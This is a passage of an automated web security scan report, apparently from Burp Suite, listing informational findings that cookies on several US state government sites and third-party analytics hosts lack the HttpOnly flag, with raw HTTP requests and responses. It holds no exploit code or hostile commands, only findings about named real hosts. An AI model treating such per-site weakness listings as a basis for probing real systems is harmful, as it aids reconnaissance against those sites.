Set-Cookie: rpx=5328%3D11319%2C0%2C1%2C%2C%265671%3D11319%2C0%2C1%2C%2C%264212%3D11319%2C261%2C2%2C%2C%266286%3D11319%2C0%2C1%2C%2C%262372%3D11319%2C0%2C1%2C%2C%262374%3D11319%2C0%2C1%2C%2C%266073%3D11319%2C148%2C2%2C%2C%264210%3D11319%2C0%2C1%2C%2C%265852%3D11319%2C0%2C1%2C%2C%264222%3D11319%2C114%2C2%2C%2C%264894%3D11396%2C70%2C2%2C%2C%264554%3D11415%2C208%2C2%2C%2C%264214%3D11415%2C0%2C1%2C%2C%263811%3D11433%2C0%2C1%2C%2C%262939%3D11502%2C0%2C3%2C%2C%264140%3D11530%2C3%2C6%2C%2C%266552%3D11532%2C0%2C2%2C%2C; expires=Mon, 30-May-2011 15:08:26 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; expires=Thu, 27-Oct-2011 15:08:26 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

14.419. https://portal.s4web.state.mn.us/psp/por91ssap/SELFSERVICE/ENTP/h/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://portal.s4web.state.mn.us
Path:   /psp/por91ssap/SELFSERVICE/ENTP/h/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /psp/por91ssap/SELFSERVICE/ENTP/h/?tab=MN_GUEST HTTP/1.1
Host: portal.s4web.state.mn.us
Connection: keep-alive
Referer: http://www.state.mn.us/portal/mn/jsp/home.do?agency=NorthStar
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=205212754.145768528.1304161967.1304161967.1304161967.1; __utmb=205212754; __utmc=205212754; __utmz=205212754.1304161967.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Cache-Control: no-store
Connection: close
Date: Sat, 30 Apr 2011 11:18:03 GMT
Location: https://portal.s4web.state.mn.us/psp/por91ssap/SELFSERVICE/ENTP/h/?tab=MN_GUEST&
Content-Type: text/html
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: web3-80-PORTAL-PSJSESSIONID=cr9QN7vL1xm6SKKnWRVmmVfY7kphtMG8!-315906014; path=/; HttpOnly=
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerprodss-SWIFT_https=537569472.38427.0000; path=/
Content-Length: 363

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://portal.s4web.state.mn.us/p
...[SNIP]...

14.420. http://sc.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sc.gov
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: sc.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Object Moved
Content-Length: 155
Content-Type: text/html
Location: http://sc.gov/Pages/default.aspx
Server: Microsoft-IIS/6.0
MicrosoftSharePointTeamServices: 12.0.0.6211
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 00:36:02 GMT
Set-Cookie: BIGipServerAgencySite=855793418.20480.0000; path=/

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://sc.gov/Pages/default.aspx">here</a></body>

14.421. http://scholar.google.com/schhp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scholar.google.com
Path:   /schhp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /schhp HTTP/1.1
Host: scholar.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: GSP=ID=fc6b07d896d76b4d; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/; domain=.scholar.google.com
Set-Cookie: PREF=ID=fc6b07d896d76b4d:TM=1304166309:LM=1304166309:S=GyXBYpL8gFdlFl1A; expires=Mon, 29-Apr-2013 12:25:09 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Sat, 30 Apr 2011 12:25:09 GMT
Server: scholar
Expires: Sat, 30 Apr 2011 12:25:09 GMT
Cache-Control: private
Connection: close

<html><head><meta http-equiv="content-type" content="text/html;charset=UTF-8"><meta HTTP-EQUIV="imagetoolbar" content="no"><link rel="canonical" href="/"><title>Google Scholar</title><style>body,td,a,
...[SNIP]...

14.422. http://sd.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sd.gov
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: sd.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=QKQJZWS164.154.226.253CKOLO; path=/
Cache-Control: private
Date: Sat, 30 Apr 2011 11:12:29 GMT
Content-Type: text/html; charset=iso-8859-1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 17867


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">


   <!--<span id="
...[SNIP]...

14.423. http://sdc.state.nj.us/dcs9ir25300000ggffs6h6i8r_2f2e/dcs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sdc.state.nj.us
Path:   /dcs9ir25300000ggffs6h6i8r_2f2e/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcs9ir25300000ggffs6h6i8r_2f2e/dcs.gif?&dcsdat=1304117395547&dcssip=nj.gov&dcsuri=/&WT.co_f=173.193.214.243-3007478048.30148287&WT.vtid=173.193.214.243-3007478048.30148287&WT.vtvs=1304117395706&WT.vt_f_tlv=0&WT.tz=-5&WT.bh=17&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=The%20Official%20Web%20Site%20for%20The%20State%20of%20New%20Jersey&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=998x935&WT.fv=10.2&WT.slv=Unknown&WT.tv=8.6.2&WT.dl=0&WT.ssl=0&WT.es=nj.gov/&WT.cg_n=example&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1 HTTP/1.1
Host: sdc.state.nj.us
Proxy-Connection: keep-alive
Referer: http://nj.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 303 Object Moved
Connection: close
Date: Fri, 29 Apr 2011 22:49:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /dcs9ir25300000ggffs6h6i8r_2f2e/dcs.gif?dcsredirect=1&dcsdat=1304117395547&dcssip=nj.gov&dcsuri=/&WT.co_f=173.193.214.243-3007478048.30148287&WT.vtid=173.193.214.243-3007478048.30148287&WT.vtvs=1304117395706&WT.vt_f_tlv=0&WT.tz=-5&WT.bh=17&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=The%20Official%20Web%20Site%20for%20The%20State%20of%20New%20Jersey&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=998x935&WT.fv=10.2&WT.slv=Unknown&WT.tv=8.6.2&WT.dl=0&WT.ssl=0&WT.es=nj.gov/&WT.cg_n=example&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1
Content-Length: 0
Set-Cookie: WEBTRENDS_ID=173.193.214.243-3007478048.30148287; expires=Mon, 26-Apr-2021 22:49:31 GMT; path=/dcs9ir25300000ggffs6h6i8r_2f2e
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"


14.424. http://sdc.state.nj.us/dcs9ir25300000ggffs6h6i8r_2f2e/dcs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sdc.state.nj.us
Path:   /dcs9ir25300000ggffs6h6i8r_2f2e/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcs9ir25300000ggffs6h6i8r_2f2e/dcs.gif?dcsredirect=1&dcsdat=1304117395547&dcssip=nj.gov&dcsuri=/&WT.co_f=173.193.214.243-3007478048.30148287&WT.vtid=173.193.214.243-3007478048.30148287&WT.vtvs=1304117395706&WT.vt_f_tlv=0&WT.tz=-5&WT.bh=17&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=The%20Official%20Web%20Site%20for%20The%20State%20of%20New%20Jersey&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=998x935&WT.fv=10.2&WT.slv=Unknown&WT.tv=8.6.2&WT.dl=0&WT.ssl=0&WT.es=nj.gov/&WT.cg_n=example&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1 HTTP/1.1
Host: sdc.state.nj.us
Proxy-Connection: keep-alive
Referer: http://nj.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WEBTRENDS_ID=173.193.214.243-3007478048.30148287

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Last-Modified: Wed, 07 Mar 2007 17:00:42 GMT
Accept-Ranges: bytes
ETag: "0599d23da60c71:5e6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0zMDA3NDc4MDQ4LjMwMTQ4Mjg3AAAAAAABAAAAAgAAAH1Au019QLtNAQAAAAEAAAB9QLtNfUC7TQAAAAA-; path=/; expires=Mon, 26-Apr-2021 22:49:33 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Date: Fri, 29 Apr 2011 22:49:32 GMT
Connection: close

GIF89a.............!.......,...........D..;

14.425. http://server.iad.liveperson.net/hc/33511087/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://server.iad.liveperson.net
Path:   /hc/33511087/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/33511087/?visitor=&msessionkey=&site=33511087&cmd=knockPage&page=http%3A//de.gov/topics/yourgovernment&visitorStatus=INSITE_STATUS&activePlugin=none&pageWindowName=&javaSupport=true&id=5637922666&scriptVersion=1.1&d=1304123921451&title=Delaware.gov%20--%20Your%20Government&referrer= HTTP/1.1
Host: server.iad.liveperson.net
Proxy-Connection: keep-alive
Referer: http://de.gov/topics/yourgovernment
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=5345014392284718453; LivePersonID=LP i=16601209214853,d=1303177644; HumanClickACTIVE=1304123896496

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:38:19 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=7894384200688321012; path=/hc/33511087
Set-Cookie: HumanClickACTIVE=1304123899907; expires=Sun, 01-May-2011 00:38:19 GMT; path=/
Content-Type: image/gif
Last-Modified: Sat, 30 Apr 2011 00:38:19 GMT
Cache-Control: private
Content-Length: 34

GIF89aZ............,...........L.;

14.426. http://server.iad.liveperson.net/hc/33511087/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://server.iad.liveperson.net
Path:   /hc/33511087/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/33511087/?visitor=&msessionkey=&site=33511087&cmd=startPage&page=http%3A//de.gov/topics/yourgovernment&visitorStatus=INSITE_STATUS&activePlugin=none&pageWindowName=&javaSupport=true&id=5637922666&scriptVersion=1.1&d=1304123925477&&amp;SESSIONVAR!skill=Portal_Topics&amp;PAGEVAR!skill=Portal_Topics&scriptType=SERVERBASED&title=Delaware.gov%20--%20Your%20Government&referrer= HTTP/1.1
Host: server.iad.liveperson.net
Proxy-Connection: keep-alive
Referer: http://de.gov/topics/yourgovernment
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=3209989796884927126; LivePersonID=LP i=16601209214853,d=1303177644; HumanClickACTIVE=1304123898833

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:38:22 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: LivePersonID=-16601209214853-1304123902:0; expires=Sun, 29-Apr-2012 00:38:22 GMT; path=/hc/33511087; domain=.liveperson.net
Set-Cookie: HumanClickKEY=3209989796884927126; path=/hc/33511087
Set-Cookie: HumanClickSiteContainerID_33511087=STANDALONE; path=/hc/33511087
Set-Cookie: LivePersonID=-16601209214853-1304123902:-1:-1:-1:-1; expires=Sun, 29-Apr-2012 00:38:22 GMT; path=/hc/33511087; domain=.liveperson.net
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 34

GIF89aP............,...........L.;

14.427. http://server.iad.liveperson.net/hc/33511087/x.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://server.iad.liveperson.net
Path:   /hc/33511087/x.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/33511087/x.js?cmd=file&file=chatScript3&site=33511087 HTTP/1.1
Host: server.iad.liveperson.net
Proxy-Connection: keep-alive
Referer: http://de.gov/topics/yourgovernment
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16601209214853,d=1303177644

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:38:17 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickACTIVE=1304123897617; expires=Sun, 01-May-2011 00:38:17 GMT; path=/
Set-Cookie: HumanClickKEY=8542828614811906829; path=/hc/33511087
Cache-Control: max-age=900
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Sat, 30 Apr 2011 00:38:17 GMT
Content-Length: 33369

var SCRIPT_VERSION = "1.1";

if (typeof(lpNumber) == "undefined")
lpNumber = '33511087';

var lpUseFirstParty = ("true" == "false");
var lpUseSecureCookies = ("true" == "false");
var lpUseSessionC
...[SNIP]...

14.428. http://shots.snap.com/snap_shots.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shots.snap.com
Path:   /snap_shots.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /snap_shots.js HTTP/1.1
Host: shots.snap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:28:19 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17
X-Powered-By: PHP/5.2.17
P3P: CP="NOI DSP COR CURa PSDa OUR NOR NAV STA"
Set-Cookie: spa=deleted; expires=Fri, 30-Apr-2010 12:28:18 GMT; path=/; domain=.snap.com
Set-Cookie: user=id%3D6c2fde5507cb316f585add6ac2aa00a9%26exp%3D1367152099%26v%3D2; expires=Sun, 28-Apr-2013 12:28:19 GMT; path=/; domain=.snap.com
Set-Cookie: user=id%3D6c2fde5507cb316f585add6ac2aa00a9%26exp%3D1367152099%26v%3D2%26origin%3Dshots; expires=Sun, 28-Apr-2013 12:28:19 GMT; path=/; domain=.snap.com
Content-Length: 15083
Cache-Control: max-age=7200
Expires: Sat, 30 Apr 2011 14:28:19 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

//<!--
/*! Snap Shots Code Copyright (c) 2009, Snap Technologies, Inc. All rights reserved.
* Your use of this code is subject to the Snap Shots Terms of Service
* located at https://account.snap
...[SNIP]...

14.429. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s21968461417127  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stateofgeorgia.122.2o7.net
Path:   /b/ss/georgiagovprod/1/H.16/s21968461417127

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/georgiagovprod/1/H.16/s21968461417127 HTTP/1.1
Host: stateofgeorgia.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26DDACB3851D250C-400001292008D758[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE];

Response

HTTP/1.1 302 Found
Date: Sat, 30 Apr 2011 12:28:24 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_ikax7Cigoiaxxx7Ex7Caj=[CS]v4|0-0|4DBC0068[CE]; Expires=Thu, 28 Apr 2016 12:28:24 GMT; Domain=.2o7.net; Path=/
Location: http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s21968461417127?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Fri, 29 Apr 2011 12:28:24 GMT
Last-Modified: Sun, 01 May 2011 12:28:24 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www96
Content-Length: 0
Content-Type: text/plain
Connection: close


14.430. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s22063515547197  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stateofgeorgia.122.2o7.net
Path:   /b/ss/georgiagovprod/1/H.16/s22063515547197

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/georgiagovprod/1/H.16/s22063515547197 HTTP/1.1
Host: stateofgeorgia.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26DDACB3851D250C-400001292008D758[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE];

Response

HTTP/1.1 302 Found
Date: Sat, 30 Apr 2011 12:28:24 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_ikax7Cigoiaxxx7Ex7Caj=[CS]v4|0-0|4DBC0068[CE]; Expires=Thu, 28 Apr 2016 12:28:24 GMT; Domain=.2o7.net; Path=/
Location: http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s22063515547197?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Fri, 29 Apr 2011 12:28:24 GMT
Last-Modified: Sun, 01 May 2011 12:28:24 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www377
Content-Length: 0
Content-Type: text/plain
Connection: close


14.431. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s22238083938136  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stateofgeorgia.122.2o7.net
Path:   /b/ss/georgiagovprod/1/H.16/s22238083938136

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/georgiagovprod/1/H.16/s22238083938136 HTTP/1.1
Host: stateofgeorgia.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26DDACB3851D250C-400001292008D758[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE];

Response

HTTP/1.1 302 Found
Date: Sat, 30 Apr 2011 12:28:25 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_ikax7Cigoiaxxx7Ex7Caj=[CS]v4|0-0|4DBC0069[CE]; Expires=Thu, 28 Apr 2016 12:28:25 GMT; Domain=.2o7.net; Path=/
Location: http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s22238083938136?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Fri, 29 Apr 2011 12:28:25 GMT
Last-Modified: Sun, 01 May 2011 12:28:25 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www393
Content-Length: 0
Content-Type: text/plain
Connection: close


14.432. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s25464643554296  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stateofgeorgia.122.2o7.net
Path:   /b/ss/georgiagovprod/1/H.16/s25464643554296

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/georgiagovprod/1/H.16/s25464643554296 HTTP/1.1
Host: stateofgeorgia.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
